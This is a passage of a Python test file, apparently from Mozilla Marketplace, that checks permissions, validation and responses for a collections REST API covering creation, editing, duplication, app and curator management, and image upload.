eq_(data['id'], self.collection.pk)
ok_('API-Fallback' not in res)
def test_detail(self):
res, data = self.detail(self.anon)
ok_(not data['image'])
@override_settings(STATIC_URL='https://testserver-cdn/')
def test_detail_image(self):
storage.open(self.collection.image_path(), 'w').write(IMAGE_DATA)
self.collection.update(image_hash='bbbbbb')
res, data = self.detail(self.anon)
self.assertApiUrlEqual(data['image'],
'/rocketfuel/collections/%s/image.png?bbbbbb' % self.collection.pk,
scheme='https', netloc='testserver-cdn')
def test_detail_slug(self):
self.detail(self.client, collection_id=self.collection.slug)
def test_detail_slug_anon(self):
self.detail(self.anon, collection_id=self.collection.slug)
def test_detail_no_perms(self):
self.detail(self.client)
def test_detail_has_perms(self):
self.make_publisher()
self.detail(self.client)
def test_detail_curator(self):
self.make_curator()
self.detail(self.client)
class TestCollectionViewSetCreate(BaseCollectionViewSetTest):
"""
Tests the handling of POST requests to the list endpoint of
CollectionViewSet.
"""
def create(self, client):
res = client.post(self.list_url, json.dumps(self.collection_data))
data = json.loads(res.content)
return res, data
def test_create_anon(self):
res, data = self.create(self.anon)
eq_(res.status_code, 403)
def test_create_no_perms(self):
res, data = self.create(self.client)
eq_(res.status_code, 403)
def test_create_curator(self):
self.make_curator
res, data = self.create(self.client)
eq_(res.status_code, 403)
def test_create_has_perms(self):
self.make_publisher()
res, data = self.create(self.client)
eq_(res.status_code, 201)
new_collection = Collection.objects.get(pk=data['id'])
ok_(new_collection.pk != self.collection.pk)
self.collection_data['slug'] = u'my-favourite-gamés-1'
# Verify that the collection metadata is correct.
keys = self.collection_data.keys()
keys.remove('name')
keys.remove('description')
for field in keys:
eq_(data[field], self.collection_data[field])
eq_(getattr(new_collection, field), self.collection_data[field])
# Test name and description separately as we return the whole dict
# with all translations.
eq_(data['name'], data['name'])
eq_(new_collection.name, data['name']['en-US'])
eq_(data['description'], data['description'])
eq_(new_collection.description, data['description']['en-US'])
def test_create_validation_operatorshelf_category(self):
self.category = Category.objects.create(type=amo.ADDON_WEBAPP,
name='Grumpy', slug='grumpy-cat')
self.make_publisher()
self.collection_data.update({
'category': self.category.pk,
'collection_type': COLLECTIONS_TYPE_OPERATOR
})
res, data = self.create(self.client)
ok_(res.status_code, 400)
ok_('non_field_errors' in data.keys())
def test_create_empty_description_dict_in_default_language(self):
"""
Test that we can't have an empty Translation for the default_language.
"""
# See bug https://bugzilla.mozilla.org/show_bug.cgi?id=915652
raise SkipTest
self.make_publisher()
self.collection_data = {
'collection_type': COLLECTIONS_TYPE_BASIC,
'name': 'whatever',
'description': {'en-US': ' ', 'fr': 'lol'},
}
res, data = self.create(self.client)
# The description dict is not empty, but it contains an empty
# translation for en-US, which is incorrect since it's the default
# language (it'll save ok, but then fail when reloading).
# It could work if translation system wasn't insisting on
# loading only the default+current language...
eq_(res.status_code, 400)
ok_('description' in data)
def test_create_no_colors(self):
self.collection_data['background_color'] = ''
self.collection_data['text_color'] = ''
self.test_create_has_perms()
def test_create_has_perms_no_type(self):
self.make_publisher()
self.collection_data.pop('collection_type')
res, data = self.create(self.client)
eq_(res.status_code, 400)
def test_create_has_perms_no_slug(self):
self.make_publisher()
self.collection_data.pop('slug')
res, data = self.create(self.client)
eq_(res.status_code, 201)
eq_(data['slug'], slugify(self.collection_data['name']['en-US']))
def test_create_collection_no_author(self):
self.make_publisher()
self.collection_data.pop('author')
res, data = self.create(self.client)
eq_(res.status_code, 201)
new_collection = Collection.objects.get(pk=data['id'])
ok_(new_collection.pk != self.collection.pk)
eq_(new_collection.author, '')
def test_create_featured_duplicate(self):
"""
Featured Apps & Operator Shelf should not have duplicates for a
region / carrier / category combination. Make sure this is respected
when creating a new collection.
"""
self.setup_unique()
self.collection_data['category'] = self.collection_data['category'].pk
res, data = self.create(self.client)
eq_(res.status_code, 400)
ok_('collection_uniqueness' in data)
def test_create_featured_duplicate_different_category(self):
"""
Try to create a new collection with the duplicate data from our
featured collection, this time changing the category.
"""
self.setup_unique()
nyan = Category.objects.create(type=amo.ADDON_WEBAPP, name='Nyan Cat',
slug='nyan-cat')
self.collection_data['category'] = nyan.pk
res, data = self.create(self.client)
eq_(res.status_code, 201)
class TestCollectionViewSetDelete(BaseCollectionViewSetTest):
"""
Tests the handling of DELETE requests to a single collection on
CollectionViewSet.
"""
def delete(self, client, collection_id=None):
url = self.collection_url('detail',
collection_id or self.collection.pk)
res = client.delete(url)
data = json.loads(res.content) if res.content else None
return res, data
def test_delete_anon(self):
res, data = self.delete(self.anon)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_delete_no_perms(self):
res, data = self.delete(self.client)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_delete_curator(self):
self.make_curator()
res, data = self.delete(self.client)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_delete_has_perms(self):
self.make_publisher()
res, data = self.delete(self.client)
eq_(res.status_code, 204)
ok_(not data)
def test_delete_slug(self):
self.make_publisher()
res, data = self.delete(self.client,
collection_id=self.collection.slug)
eq_(res.status_code, 204)
ok_(not data)
def test_delete_nonexistent(self):
self.make_publisher()
res, data = self.delete(self.client, collection_id=100000)
eq_(res.status_code, 404)
class TestCollectionViewSetDuplicate(BaseCollectionViewSetTest):
"""
Tests the `duplicate` action on CollectionViewSet.
"""
def duplicate(self, client, data=None, collection_id=None):
if not data:
data = {}
url = self.collection_url('duplicate',
collection_id or self.collection.pk)
res = client.post(url, json.dumps(data))
data = json.loads(res.content)
return res, data
def test_duplicate_anon(self):
res, data = self.duplicate(self.anon)
eq_(res.status_code, 403)
def test_duplicate_no_perms(self):
res, data = self.duplicate(self.client)
eq_(res.status_code, 403)
def test_duplicate_curator(self):
self.make_curator()
res, data = self.duplicate(self.client)
eq_(res.status_code, 201)
def test_duplicate_has_perms(self):
self.make_publisher()
original = self.collection
res, data = self.duplicate(self.client)
eq_(res.status_code, 201)
new_collection = Collection.objects.get(pk=data['id'])
ok_(new_collection.pk != original.pk)
ok_(new_collection.slug)
ok_(new_collection.slug != original.slug)
# Verify that the collection metadata is correct. We duplicated
# self.collection, which was created with self.collection_data, so
# use that.
original = self.collection
keys = self.collection_data.keys()
keys.remove('name')
keys.remove('description')
keys.remove('slug')
for field in keys:
eq_(data[field], self.collection_data[field])
eq_(getattr(new_collection, field), self.collection_data[field])
eq_(getattr(new_collection, field), getattr(original, field))
# Test name and description separately as we return the whole dict
# with all translations.
eq_(data['name'], self.collection_data['name'])
eq_(new_collection.name, data['name']['en-US'])
eq_(new_collection.name, original.name)
eq_(data['description'], self.collection_data['description'])
eq_(new_collection.description, data['description']['en-US'])
eq_(new_collection.description, original.description)
def test_duplicate_slug(self):
self.make_publisher()
res, data = self.duplicate(self.client,
collection_id=self.collection.slug)
eq_(res.status_code, 201)
def test_duplicate_apps(self):
self.make_publisher()
self.create_apps(number=2)
self.add_apps_to_collection(*self.apps)
res, data = self.duplicate(self.client)
eq_(res.status_code, 201)
new_collection = Collection.objects.get(pk=data['id'])
ok_(new_collection.pk != self.collection.pk)
eq_(list(new_collection.apps()), list(self.collection.apps()))
eq_(len(data['apps']), len(self.apps))
for order, app in enumerate(self.apps):
eq_(int(data['apps'][order]['id']), self.apps[order].pk)
def test_duplicate_override(self):
self.make_publisher()
override_data = {
'collection_type': COLLECTIONS_TYPE_OPERATOR,
'region': mkt.regions.SPAIN.id
}
res, data = self.duplicate(self.client, override_data)
eq_(res.status_code, 201)
new_collection = Collection.objects.get(pk=data['id'])
ok_(new_collection.pk != self.collection.pk)
for key in override_data:
eq_(getattr(new_collection, key), override_data[key])
ok_(getattr(new_collection, key) != getattr(self.collection, key))
# We return slugs always in data, so test that separately.
expected_data = {
'collection_type': COLLECTIONS_TYPE_OPERATOR,
'region': mkt.regions.SPAIN.slug
}
for key in expected_data:
eq_(data[key], expected_data[key])
def test_duplicate_invalid_data(self):
self.make_publisher()
override_data = {
'collection_type': COLLECTIONS_TYPE_OPERATOR,
'region': max(mkt.regions.REGION_IDS) + 1
}
res, data = self.duplicate(self.client, override_data)
eq_(res.status_code, 400)
def test_duplicate_featured(self):
self.setup_unique()
res, data = self.duplicate(self.client)
eq_(res.status_code, 400)
ok_('collection_uniqueness' in data)
def test_duplicate_operator(self):
self.setup_unique()
self.collection.update(collection_type=COLLECTIONS_TYPE_OPERATOR,
carrier=None, category=None)
res, data = self.duplicate(self.client)
eq_(res.status_code, 400)
ok_('collection_uniqueness' in data)
class CollectionViewSetChangeAppsMixin(BaseCollectionViewSetTest):
"""
Mixin containing common methods to actions that modify the apps belonging
to a collection.
"""
def add_app(self, client, app_id=None, collection_id=None):
if app_id is None:
self.create_apps()
app_id = self.apps[0].pk
form_data = {'app': app_id} if app_id else {}
url = self.collection_url('add-app',
collection_id or self.collection.pk)
res = client.post(url, json.dumps(form_data))
data = json.loads(res.content)
return res, data
def remove_app(self, client, app_id=None, collection_id=None):
if app_id is None:
self.create_apps(number=2)
app_id = self.apps[0].pk
form_data = {'app': app_id} if app_id else {}
url = self.collection_url('remove-app',
collection_id or self.collection.pk)
remove_res = client.post(url, json.dumps(form_data))
remove_data = (json.loads(remove_res.content)
if remove_res.content else None)
return remove_res, remove_data
def reorder(self, client, order=None, collection_id=None):
if order is None:
order = {}
url = self.collection_url('reorder',
collection_id or self.collection.pk)
res = client.post(url, json.dumps(order))
data = json.loads(res.content)
return res, data
class TestCollectionViewSetAddApp(CollectionViewSetChangeAppsMixin):
"""
Tests the `add-app` action on CollectionViewSet.
"""
def test_add_app_anon(self):
res, data = self.add_app(self.anon)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_add_app_no_perms(self):
res, data = self.add_app(self.client)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_add_app_has_perms(self):
eq_(list(self.collection.apps()), [])
self.make_publisher()
res, data = self.add_app(self.client)
eq_(res.status_code, 200)
eq_(list(self.collection.apps()), [self.apps[0]])
def test_add_app_slug(self):
eq_(list(self.collection.apps()), [])
self.make_publisher()
res, data = self.add_app(self.client,
collection_id=self.collection.slug)
eq_(res.status_code, 200)
eq_(list(self.collection.apps()), [self.apps[0]])
def test_add_app_curator(self):
eq_(list(self.collection.apps()), [])
self.make_curator()
res, data = self.add_app(self.client)
eq_(res.status_code, 200)
eq_(list(self.collection.apps()), [self.apps[0]])
def test_add_app_nonexistent(self):
self.make_publisher()
res, data = self.add_app(self.client, app_id=100000)
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['doesnt_exist'], data['detail'])
def test_add_app_empty(self):
self.make_publisher()
res, data = self.add_app(self.client, app_id=False)
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['not_provided'], data['detail'])
def test_add_app_duplicate(self):
self.make_publisher()
self.add_app(self.client)
res, data = self.add_app(self.client)
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['already_in'], data['detail'])
class TestCollectionViewSetRemoveApp(CollectionViewSetChangeAppsMixin):
"""
Tests the `remove-app` action on CollectionViewSet.
"""
def test_remove_app_anon(self):
res, data = self.remove_app(self.anon)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_remove_app_no_perms(self):
res, data = self.remove_app(self.client)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_remove_app_has_perms(self):
self.make_publisher()
self.add_app(self.client)
res, data = self.remove_app(self.client)
eq_(res.status_code, 200)
eq_(len(data['apps']), 0)
def test_remove_app_slug(self):
self.make_publisher()
self.add_app(self.client)
res, data = self.remove_app(self.client,
collection_id=self.collection.slug)
eq_(res.status_code, 200)
eq_(len(data['apps']), 0)
def test_remove_app_curator(self):
self.make_curator()
self.add_app(self.client)
res, data = self.remove_app(self.client)
eq_(res.status_code, 200)
eq_(len(data['apps']), 0)
def test_remove_app_nonexistent(self):
self.make_publisher()
res, data = self.remove_app(self.client, app_id=100000)
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['doesnt_exist'], data['detail'])
def test_remove_app_empty(self):
self.make_publisher()
res, data = self.remove_app(self.client, app_id=False)
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['not_provided'], data['detail'])
def test_remove_app_invalid(self):
self.make_publisher()
self.create_apps(number=2)
self.add_app(self.client, app_id=self.apps[0].pk)
res, data = self.remove_app(self.client, app_id=self.apps[1].pk)
eq_(res.status_code, 205)
ok_(not data)
class TestCollectionViewSetReorderApps(CollectionViewSetChangeAppsMixin):
"""
Tests the `reorder` action on CollectionViewSet.
"""
def random_app_order(self):
apps = list(a.pk for a in self.apps)
shuffle(apps)
return apps
def test_reorder_anon(self):
res, data = self.reorder(self.anon)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_reorder_no_perms(self):
res, data = self.reorder(self.client)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_reorder_has_perms(self):
self.make_publisher()
self.create_apps()
self.add_apps_to_collection(*self.apps)
new_order = self.random_app_order()
res, data = self.reorder(self.client, order=new_order)
eq_(res.status_code, 200)
for order, app in enumerate(data['apps']):
app_pk = new_order[order]
eq_(Webapp.objects.get(pk=app_pk).app_slug, app['slug'])
def test_reorder_slug(self):
self.make_publisher()
self.create_apps()
self.add_apps_to_collection(*self.apps)
new_order = self.random_app_order()
res, data = self.reorder(self.client, order=new_order,
collection_id=self.collection.slug)
eq_(res.status_code, 200)
for order, app in enumerate(data['apps']):
app_pk = new_order[order]
eq_(Webapp.objects.get(pk=app_pk).app_slug, app['slug'])
def test_reorder_curator(self):
self.make_curator()
self.create_apps()
self.add_apps_to_collection(*self.apps)
new_order = self.random_app_order()
res, data = self.reorder(self.client, order=new_order)
eq_(res.status_code, 200)
for order, app in enumerate(data['apps']):
app_pk = new_order[order]
eq_(Webapp.objects.get(pk=app_pk).app_slug, app['slug'])
def test_reorder_missing_apps(self):
self.make_publisher()
self.create_apps()
self.add_apps_to_collection(*self.apps)
new_order = self.random_app_order()
new_order.pop()
res, data = self.reorder(self.client, order=new_order)
eq_(res.status_code, 400)
eq_(data['detail'], CollectionViewSet.exceptions['app_mismatch'])
self.assertSetEqual(data['apps'],
[a.pk for a in self.collection.apps()])
class TestCollectionViewSetEditCollection(BaseCollectionViewSetTest):
"""
Tests the handling of PATCH requests to a single collection on
CollectionViewSet.
"""
def edit_collection(self, client, collection_id=None, **kwargs):
url = self.collection_url('detail',
collection_id or self.collection.pk)
res = client.patch(url, json.dumps(kwargs))
data = json.loads(res.content)
return res, data
def test_edit_collection_anon(self):
res, data = self.edit_collection(self.anon)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_edit_collection_name_and_description_simple(self):
self.make_publisher()
updates = {
'description': u'¿Dónde está la biblioteca?',
'name': u'Allö',
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
self.collection.reload()
for key, value in updates.iteritems():
eq_(data[key], {'en-US': value})
eq_(getattr(self.collection, key), value)
def test_edit_collection_name_and_description_slug(self):
self.make_publisher()
updates = {
'description': u'¿Dónde está la biblioteca?',
'name': u'Allö',
}
res, data = self.edit_collection(self.client,
collection_id=self.collection.slug,
**updates)
eq_(res.status_code, 200)
self.collection.reload()
for key, value in updates.iteritems():
eq_(data[key], {'en-US': value})
eq_(getattr(self.collection, key), value)
def test_edit_collection_name_and_description_curator(self):
self.make_curator()
updates = {
'description': u'¿Dónde está la biblioteca?',
'name': u'Allö',
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
self.collection.reload()
for key, value in updates.iteritems():
eq_(data[key], {'en-US': value})
eq_(getattr(self.collection, key), value)
def test_edit_collection_name_and_description_multiple_translations(self):
self.make_publisher()
updates = {
'name': {
'en-US': u'Basta the potato',
'fr': u'Basta la pomme de terre',
'es': u'Basta la pâtätà',
'it': u'Basta la patata'
},
'description': {
'en-US': 'Basta likes potatoes and Le Boulanger',
'fr': 'Basta aime les patates et Le Boulanger',
'es': 'Basta gusta las patatas y Le Boulanger',
'it': 'Basta ama patate e Le Boulanger'
}
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
self.collection = Collection.objects.get(pk=self.collection.pk)
for key, value in updates.iteritems():
eq_(getattr(self.collection, key), updates[key]['en-US'])
with translation.override('es'):
collection_in_es = Collection.objects.get(pk=self.collection.pk)
eq_(getattr(collection_in_es, key), updates[key]['es'])
with translation.override('fr'):
collection_in_fr = Collection.objects.get(pk=self.collection.pk)
eq_(getattr(collection_in_fr, key), updates[key]['fr'])
def test_edit_collection_name_strip(self):
self.make_publisher()
updates = {
'name': {
'en-US': u' New Nâme! '
},
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
self.collection = Collection.objects.get(pk=self.collection.pk)
eq_(data['name'], {u'en-US': u'New Nâme!'})
eq_(self.collection.name, u'New Nâme!')
def test_edit_collection_has_perms(self):
self.make_publisher()
cat = Category.objects.create(type=amo.ADDON_WEBAPP, name='Grumpy',
slug='grumpy-cat')
updates = {
'author': u'Nöt Me!',
'region': mkt.regions.SPAIN.id,
'is_public': False,
'name': {'en-US': u'clôuserw soundboard'},
'description': {'en-US': u'Gèt off my lawn!'},
'category': cat.pk,
'carrier': mkt.carriers.TELEFONICA.id,
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
collection = self.collection.reload()
# Test that the result and object contain the right values. We can't
# easily loop on updates dict because data is stored and serialized
# in different ways depending on the field.
eq_(data['author'], updates['author'])
eq_(collection.author, updates['author'])
eq_(data['is_public'], updates['is_public'])
eq_(collection.is_public, updates['is_public'])
eq_(data['name'], updates['name'])
eq_(collection.name, updates['name']['en-US'])
eq_(data['description'], updates['description'])
eq_(collection.description, updates['description']['en-US'])
eq_(data['category'], cat.slug)
eq_(collection.category, cat)
eq_(data['region'], mkt.regions.SPAIN.slug)
eq_(collection.region, updates['region'])
eq_(data['carrier'], mkt.carriers.TELEFONICA.slug)
eq_(collection.carrier, updates['carrier'])
def test_edit_collection_with_slugs(self):
self.make_publisher()
cat = Category.objects.create(type=amo.ADDON_WEBAPP, name='Grumpy',
slug='grumpy-cat')
updates = {
'region': mkt.regions.SPAIN.slug,
'category': cat.slug,
'carrier': mkt.carriers.TELEFONICA.slug,
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
collection = self.collection.reload()
# Test that the result and object contain the right values. We can't
# easily loop on updates dict because data is stored and serialized
# in different ways depending on the field.
eq_(data['region'], mkt.regions.SPAIN.slug)
eq_(collection.region, mkt.regions.SPAIN.id)
eq_(data['carrier'], mkt.carriers.TELEFONICA.slug)
eq_(collection.carrier, mkt.carriers.TELEFONICA.id)
eq_(data['category'], cat.slug)
eq_(collection.category, cat)
def test_edit_collection_invalid_carrier_slug(self):
self.make_publisher()
# Invalid carrier slug.
updates = {'carrier': 'whateverlol'}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_invalid_carrier(self):
self.make_publisher()
# Invalid carrier id.
updates = {'carrier': 1576}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_null_values(self):
self.make_publisher()
cat = Category.objects.create(type=amo.ADDON_WEBAPP, name='Grumpy',
slug='grumpy-cat')
self.collection.update(**{
'carrier': mkt.carriers.UNKNOWN_CARRIER.id,
'region': mkt.regions.SPAIN.id,
'category': cat,
})
updates = {
'carrier': None,
'region': None,
'category': None,
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
self.collection.reload()
for key, value in updates.iteritems():
eq_(data[key], value)
eq_(getattr(self.collection, key), value)
def test_edit_collection_invalid_region_0(self):
# 0 is an invalid region. Unfortunately, because django bug #18724 is
# fixed in django 1.5 but not 1.4, '0' values are accepted.
# Unskip this test when using django 1.5.
raise SkipTest('Test that needs django 1.5 to pass')
self.make_publisher()
updates = {'region': 0}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_invalid_region(self):
self.make_publisher()
# Invalid region id.
updates = {'region': max(mkt.regions.REGION_IDS) + 1}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_invalid_region_slug(self):
self.make_publisher()
# Invalid region slug.
updates = {'region': 'idontexist'}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_invalid_category(self):
self.make_publisher()
eq_(Category.objects.count(), 0)
# Invalid (non-existant) category.
updates = {'category': 1}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_invalid_category_slug(self):
self.make_publisher()
eq_(Category.objects.count(), 0)
# Invalid (non-existant) category slug.
updates = {'category': 'nosuchcat'}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_featured_duplicate(self):
"""
Featured Apps & Operator Shelf should not have duplicates for a
region / carrier / category combination. Make sure this is respected
when editing a collection.
"""
self.setup_unique()
self.collection_data.update({
'region': mkt.regions.US.id,
'carrier': mkt.carriers.SPRINT.id
})
extra_collection = Collection.objects.create(**self.collection_data)
# Try to edit self.collection with the data from our extra_collection.
update_data = {
'region': extra_collection.region,
'carrier': extra_collection.carrier,
}
res, data = self.edit_collection(self.client, **update_data)
eq_(res.status_code, 400)
ok_('collection_uniqueness' in data)
# Changing the collection type should be enough to make it work.
update_data['collection_type'] = COLLECTIONS_TYPE_BASIC
res, data = self.edit_collection(self.client, **update_data)
eq_(res.status_code, 200)
# A dumb change to see if you can still edit afterwards. The uniqueness
# check should exclude the current instance and allow it, obviously.
update_data = {'is_public': False}
res, data = self.edit_collection(self.client, **update_data)
eq_(res.status_code, 200)
def test_edit_collection_operator_shelf_duplicate(self):
"""
Featured Apps & Operator Shelf should not have duplicates for a
region / carrier / category combination. Make sure this is respected
when editing a collection.
"""
self.setup_unique()
self.collection.update(category=None,
collection_type=COLLECTIONS_TYPE_OPERATOR)
self.collection_data.update({
'category': None,
'collection_type': COLLECTIONS_TYPE_OPERATOR,
'carrier': mkt.carriers.VIMPELCOM.id,
})
extra_collection = Collection.objects.create(**self.collection_data)
# Try to edit self.collection with the data from our extra_collection.
update_data = {'carrier': extra_collection.carrier}
res, data = self.edit_collection(self.client, **update_data)
eq_(res.status_code, 400)
ok_('collection_uniqueness' in data)
# Changing the carrier should be enough to make it work.
update_data['carrier'] = mkt.carriers.SPRINT.id
res, data = self.edit_collection(self.client, **update_data)
eq_(res.status_code, 200)
# A dumb change to see if you can still edit afterwards. The uniqueness
# check should exclude the current instance and allow it, obviously.
update_data = {'is_public': False}
res, data = self.edit_collection(self.client, **update_data)
eq_(res.status_code, 200)
def test_edit_collection_validation_operatorshelf_category(self):
self.make_publisher()
category = Category.objects.create(type=amo.ADDON_WEBAPP,
name='Grumpy', slug='grumpy-cat')
updates = {
'category': category.pk,
'collection_type': COLLECTIONS_TYPE_OPERATOR
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
ok_('non_field_errors' in data)
class TestCollectionViewSetListCurators(BaseCollectionViewSetTest):
"""
Tests the `curators` action on CollectionViewSet.
"""
def list_curators(self, client, collection_id=None):
self.collection.add_curator(self.user2)
url = self.collection_url('curators',
collection_id or self.collection.pk)
res = client.get(url)
data = json.loads(res.content)
return res, data
def test_list_curators_no_perms(self):
res, data = self.list_curators(self.client)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_list_curators_has_perms(self):
self.make_publisher()
res, data = self.list_curators(self.client)
eq_(res.status_code, 200)
eq_(len(data), 1)
eq_(data[0]['id'], self.user2.pk)
def test_list_curators_slug(self):
self.make_publisher()
res, data = self.list_curators(self.client,
collection_id=self.collection.slug)
eq_(res.status_code, 200)
eq_(len(data), 1)
eq_(data[0]['id'], self.user2.pk)
def test_list_curators_as_curator(self):
self.make_curator()
res, data = self.list_curators(self.client)
eq_(res.status_code, 200)
eq_(len(data), 2)
for item in data:
ok_(item['id'] in [self.user.pk, self.user2.pk])
class TestCollectionViewSetAddCurator(BaseCollectionViewSetTest):
"""
Tests the `add-curator` action on CollectionViewSet.
"""
def add_curator(self, client, collection_id=None, user_id=None):
if user_id is None:
user_id = self.user.pk
form_data = {'user': user_id} if user_id else {}
url = self.collection_url('add-curator',
collection_id or self.collection.pk)
res = client.post(url, json.dumps(form_data))
data = json.loads(res.content)
return res, data
def test_add_curator_anon(self):
res, data = self.add_curator(self.anon)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_add_curator_no_perms(self):
res, data = self.add_curator(self.client)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_add_curator_has_perms(self):
self.make_publisher()
res, data = self.add_curator(self.client)
eq_(res.status_code, 200)
eq_(data[0]['id'], self.user.pk)
def test_add_curator_slug(self):
self.make_publisher()
res, data = self.add_curator(self.client,
collection_id=self.collection.slug)
eq_(res.status_code, 200)
eq_(data[0]['id'], self.user.pk)
def test_add_curator_multiple_cache(self):
self.make_publisher()
self.add_curator(self.client)
res, data = self.add_curator(self.client, user_id=self.user2.pk)
self.assertSetEqual([user['id'] for user in data],
[self.user.pk, self.user2.pk])
def test_add_curator_as_curator(self):
self.make_curator()
res, data = self.add_curator(self.client)
eq_(res.status_code, 200)
eq_(data[0]['id'], self.user.pk)
def test_add_curator_nonexistent(self):
self.make_publisher()
res, data = self.add_curator(self.client, user_id=100000)
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['user_doesnt_exist'], data['detail'])
res, data = self.add_curator(self.client, user_id='[email protected]')
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['user_doesnt_exist'], data['detail'])
def test_add_curator_empty(self):
self.make_publisher()
res, data = self.add_curator(self.client, user_id=False)
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['user_not_provided'], data['detail'])
def test_add_curator_email(self):
self.make_curator()
res, data = self.add_curator(self.client, user_id=self.user.email)
eq_(res.status_code, 200)
eq_(data[0]['id'], self.user.pk)
def test_add_curator_garbage(self):
self.make_publisher()
res, data = self.add_curator(self.client, user_id='garbage')
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['wrong_user_format'], data['detail'])
res, data = self.add_curator(self.client, user_id='garbage@')
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['wrong_user_format'], data['detail'])
class TestCollectionViewSetRemoveCurator(BaseCollectionViewSetTest):
"""
Tests the `remove-curator` action on CollectionViewSet.
"""
def remove_curator(self, client, collection_id=None, user_id=None):
if user_id is None:
user_id = self.user.pk
form_data = {'user': user_id} if user_id else {}
url = self.collection_url('remove-curator', self.collection.pk)
res = client.post(url, json.dumps(form_data))
data = json.loads(res.content) if res.content else None
return res, data
def test_remove_curator_anon(self):
res, data = self.remove_curator(self.anon)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_remove_curator_no_perms(self):
res, data = self.remove_curator(self.client)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_remove_curator_has_perms(self):
self.make_publisher()
res, data = self.remove_curator(self.client)
eq_(res.status_code, 205)
def test_remove_curator_slug(self):
self.make_publisher()
res, data = self.remove_curator(self.client,
collection_id=self.collection.slug)
eq_(res.status_code, 205)
def test_remove_curator_as_curator(self):
self.make_curator()
res, data = self.remove_curator(self.client)
eq_(res.status_code, 205)
def test_remove_curator_email(self):
self.make_curator()
res, data = self.remove_curator(self.client, user_id=self.user.email)
eq_(res.status_code, 205)
def test_remove_curator_nonexistent(self):
self.make_publisher()
res, data = self.remove_curator(self.client, user_id=100000)
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['user_doesnt_exist'], data['detail'])
res, data = self.remove_curator(self.client, user_id='[email protected]')
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['user_doesnt_exist'], data['detail'])
def test_remove_curator_empty(self):
self.make_publisher()
res, data = self.remove_curator(self.client, user_id=False)
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['user_not_provided'], data['detail'])
def test_remove_curator_garbage(self):
self.make_publisher()
res, data = self.remove_curator(self.client, user_id='garbage')
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['wrong_user_format'], data['detail'])
res, data = self.remove_curator(self.client, user_id='garbage@')
eq_(res.status_code, 400)
eq_(CollectionViewSet.exceptions['wrong_user_format'], data['detail'])
class TestCollectionImageViewSet(RestOAuth):
def setUp(self):
super(TestCollectionImageViewSet, self).setUp()
self.collection = Collection.objects.create(
**CollectionDataMixin.collection_data)
self.url = reverse('collection-image-detail',
kwargs={'pk': self.collection.pk})
self.img = (
'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABAQMAAAAl21bKAAAAA1BMVEUAAA'
'Cnej3aAAAAAXRSTlMAQObYZgAAAApJREFUCNdjYAAAAAIAAeIhvDMAAAAA'
'SUVORK5CYII=').decode('base64')
def add_img(self):
path = self.collection.image_path()
storage.open(path, 'w').write(self.img)
self.collection.update(image_hash='fakehash')
return path
def test_put(self, pk_or_slug=None):
if pk_or_slug is None:
pk_or_slug = self.collection.pk
self.url = reverse('collection-image-detail', kwargs={'pk': pk_or_slug})
self.assertApiUrlEqual(self.url,
'/rocketfuel/collections/%s/image/' % pk_or_slug)
self.grant_permission(self.profile, 'Collections:Curate')
res = self.client.put(self.url, 'data:image/gif;base64,' + IMAGE_DATA)
eq_(res.status_code, 204)
assert os.path.exists(self.collection.image_path())
self.collection.reload()
ok_(self.collection.has_image)
expected_hash = hashlib.md5(IMAGE_DATA.decode('base64')).hexdigest()
eq_(self.collection.image_hash, expected_hash[:8])
im = Image.open(self.collection.image_path())
im.verify()
assert im.format == 'PNG'
def test_put_slug(self):
